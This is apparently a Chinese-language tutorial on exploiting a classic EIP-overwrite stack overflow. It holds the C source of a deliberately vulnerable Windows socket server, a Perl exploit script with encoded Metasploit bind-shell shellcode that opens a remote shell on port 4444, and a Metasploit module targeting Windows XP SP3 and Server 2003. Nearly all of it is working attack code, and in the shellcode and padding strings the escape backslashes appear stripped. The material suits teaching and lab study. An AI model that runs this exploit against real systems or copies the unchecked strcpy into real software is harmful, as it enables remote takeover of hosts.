例子是:
#include <iostream.h>
#include <winsock.h>
#include <windows.h>
#include <stdio.h>
//load windows socket
#pragma comment(lib, "wsoc k32.lib")
//Define Return Messages
#define SS_ERROR 1
#define SS_OK 0
void pr( char *str)
{
char buf[500]="";
strcpy(buf,str);
}
void sError(char *str)
{
MessageBox (NULL, str, "socket Error" ,MB_OK);
WSACleanup();
}
int main(int argc, char **argv)
{
WORD sockVersion; WSADATA wsaData;
int rVal;
char Message[5000]="";
char buf[2000]="";
u_short LocalPort;
LocalPort = 200;
//wsock32 initialized for usage
sockVersion = MAKEWORD(1,1);
WSAStartup(sockVersion, &wsaData);
//create server socket
SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0);
if(serverSocket == INVALID_SOCKET)
{
sError("Failed socket()");
return SS_ERROR;
}
SOCKADDR_IN sin;
sin.sin_family = PF_INET;
sin.sin_port = htons(LocalPort);
sin.sin_addr.s_addr = INADDR_ANY;
//bind the socket
rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin));
if(rVal == SOCKET_ERROR)
{
sError("Failed bind()");
WSACleanup();
return SS_ERROR;
}
//get socket to listen
rVal = listen(serverSocket, 10);
if(rVal == SOCKET_ERROR)
{
sError("Failed listen()");
WSACleanup();
return SS_ERROR;
}
//wait for a client to connect
SOCKET clientSocket;
clientSocket = accept(serverSocket, NULL, NULL);
if(clientSocket == INVALID_SOCKET)
{
sError("Failed accept()");
WSACleanup();
return SS_ERROR;
}
int bytesRecv = SOCKET_ERROR;
while( bytesRecv == SOCKET_ERROR )
{
//receive the data that is being sent by the client max limit to 5000 bytes.
bytesRecv = recv( clientSocket, Message, 5000, 0 );
if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET )
{
printf( "
Connection Closed.
");
break;
}
}
//Pass the data received to the function pr
pr(Message);
//close client socket
closesocket(clientSocket);
//close server socket
closesocket(serverSocket);
WSACleanup();
return SS_OK;
}
典型的EIP 覆盖问题················
perl SOCKET 代码:
在CMD 中 perl 1.pl 服务器IP 服务器端口
use strict;
use Socket;
my $junk = "x41"x504;
my $eip = pack('V',0x769A1594);#0x769A1594 push esp - ret
my $prejumk = "x90"x46;
# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# LPORT=4444, RHOST=x.x.x.x, EXITFUNC=seh,
my $shellcode =
"x31xc9xdbxc3xd9x74x24xf4xb8xf3x9axbcx81x5b" .
"xb1x56x31x43x16x03x43x16x83xc3xf7x78x49x7d" .
"x1fxf5xb2x7exdfx66x3ax9bxeexb4x58xefx42x09" .
"x2axbdx6exe2x7ex56xe5x86x56x59x4ex2cx81x54" .
"x4fx80x0dx3ax93x82xf1x41xc7x64xcbx89x1ax64" .
"x0cxf7xd4x34xc5x73x46xa9x62xc1x5axc8xa4x4d" .
"xe2xb2xc1x92x96x08xcbxc2x06x06x83xfax2dx40" .
"x34xfaxe2x92x08xb5x8fx61xfax44x59xb8x03x77" .
"xa5x17x3axb7x28x69x7ax70xd2x1cx70x82x6fx27" .
"x43xf8xabxa2x56x5ax38x14xb3x5axedxc3x30x50" .
"x5ax87x1fx75x5dx44x14x81xd6x6bxfbx03xacx4f" .
"xdfx48x77xf1x46x35xd6x0ex98x91x87xaaxd2x30" .
"xdcxcdxb8x5cx11xe0x42x9dx3dx73x30xafxe2x2f" .
"xdex83x6bxf6x19xe3x46x4exb5x1ax68xafx9fxd8" .
"x3cxffxb7xc9x3cx94x47xf5xe9x3bx18x59x41xfc" .
"xc8x19x31x94x02x96x6ex84x2cx7cx19x82xe2xa4" .
"x4ax65x07x5bx7dx29x8exbdx17xc1xc6x16x8fx23" .
"x3dxafx28x5bx17x83xe1xcbx2fxcdx35xf3xafxdb" .
"x16x58x07x8cxecxb2x9cxadxf3x9exb4xa4xccx49" .
"x4exd9x9fxe8x4fxf0x77x88xc2x9fx87xc7xfex37" .
"xd0x80x31x4exb4x3cx6bxf8xaaxbcxedxc3x6ex1b" .
"xcexcax6fxeex6axe9x7fx36x72xb5x2bxe6x25x63" .
"x85x40x9cxc5x7fx1bx73x8cx17xdaxbfx0fx61xe3" .
"x95xf9x8dx52x40xbcxb2x5bx04x48xcbx81xb4xb7" .
"x06x02xcax46x9ax9fx5bxf1x4fxe2x01x02xbax21" .
"x3cx81x4exdaxbbx99x3bxdfx80x1dxd0xadx99xcb" .
"xd6x02x99xd9";
my $host = shift || 'localhost';
my $port = shift || 200;
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port,$iaddr);
socket(SOCKET,AF_INET,SOCK_STREAM,$proto) or die "socket: $!";
print "[+] Connecting to $host on port $port
";
connect(SOCKET,$paddr) or die "connect: $!";
print "[+] Sending payload";
print SOCKET $junk.$eip.$prejumk.$shellcode."
";
print "[+] Payload sent
";
close SOCKET or die "cose: $!";执行完后
telnet 服务器IP 4444 即可得到shell
主要能看懂metasploit 就好了·········
C:Program FilesMetasploitFramework3msf3modulesexploitswindowsmisc 创建文件 xxx.rb
require 'msf/core' class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Custom vulnerable server stack overflow',
'Description' => %q{
This module exploits a stack overflow in a
custom vulnerable server.
},
'Author' => [ 'Peter Van Eeckhoutte' ],
'Version' => '$Revision: 9999 $',
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1400,
'BadChars' => "x00xff",
},
'Platform' => 'win',
'Targets' =>
[
['Windows XP SP3 En', { 'Ret' => 0x7c874413, 'Offset' => 504 } ],
['Windows 2003 Server R2 SP2', { 'Ret' => 0x71c02b67, 'Offset' => 504 } ],
],
'DefaultTarget' => 0,
'Privileged' => false ))
register_options( [ Opt::RPORT(200) ], self.class)
end
def exploit
connect
junk = make_nops(target['Offset'])
sploit = junk + [target.ret].pack('V') + make_nops(50) + payload.encoded
sock.put(sploit)
handler
disconnect
end
end